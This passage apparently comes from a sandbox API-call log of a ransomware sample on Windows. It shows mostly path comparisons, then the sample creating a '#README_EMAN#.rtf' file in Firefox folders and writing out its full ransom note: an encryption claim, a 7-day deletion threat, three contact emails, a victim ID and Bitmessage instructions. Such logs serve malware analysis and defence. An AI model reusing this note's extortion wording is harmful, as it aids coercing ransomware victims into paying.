Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount2=102) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount2=87) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 3 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount1=87, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=55) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\", cchCount1=87, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=55, lpString2="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount2=72) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=55, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\", cchCount1=72, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 3 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 2 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount2=102) returned 2 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", cchCount2=58) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", cchCount2=58) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", cchCount2=58) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=55, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", cchCount2=58) returned 3 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", cchCount2=58) returned 3 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=119) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=119) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\", cchCount1=102, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=119) returned 1 [0259.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=55, lpString2="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=119) returned 1 [0259.285] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\#readme_eman#.rtf")) returned 0x20 [0259.286] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\#readme_eman#.rtf")) returned 0x20 [0259.286] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\gmp-clearkey\\0.1\\#readme_eman#.rtf")) returned 0xffffffff [0259.286] GetLastError () returned 0x2 [0259.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\gmp-clearkey\\0.1\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0259.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0259.357] 